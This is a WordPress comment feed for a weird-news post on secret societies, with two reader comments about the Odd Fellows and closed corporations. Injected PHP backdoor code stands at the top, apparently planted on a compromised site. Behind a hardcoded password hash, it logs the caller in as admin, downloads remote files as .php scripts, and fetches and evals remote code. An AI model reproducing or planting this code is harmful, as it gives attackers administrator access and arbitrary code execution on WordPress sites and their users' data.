if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'aab3238922bcc25a6f606eb525ffdc56'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
Comments on: Secret Societies
http://wtf.thebizzare.com/bizarre/secret-societies/
Weird News, Weird Stuff, Wtf PicturesWed, 13 Oct 2010 13:34:24 +0000hourly1http://wordpress.org/?v=3.0.3By: Ken
http://wtf.thebizzare.com/bizarre/secret-societies/comment-page-1/#comment-1523
KenMon, 28 Dec 2009 18:04:41 +0000http://wtf.thebizzare.com/?p=128#comment-1523This article is wrong about the Odd Fellows. It is not a "drnking club" for boys. There are men and women members and they do community service work. In Texas the Odd Fellows own Nursing Homes and Retirement Homes.This article is wrong about the Odd Fellows. It is not a “drnking club” for boys. There are men and women members and they do community service work. In Texas the Odd Fellows own Nursing Homes and Retirement Homes.
]]>
By: john
http://wtf.thebizzare.com/bizarre/secret-societies/comment-page-1/#comment-1350
johnMon, 14 Sep 2009 00:49:12 +0000http://wtf.thebizzare.com/?p=128#comment-1350These are just closed corporations, not secret societies.These are just closed corporations, not secret societies.
]]>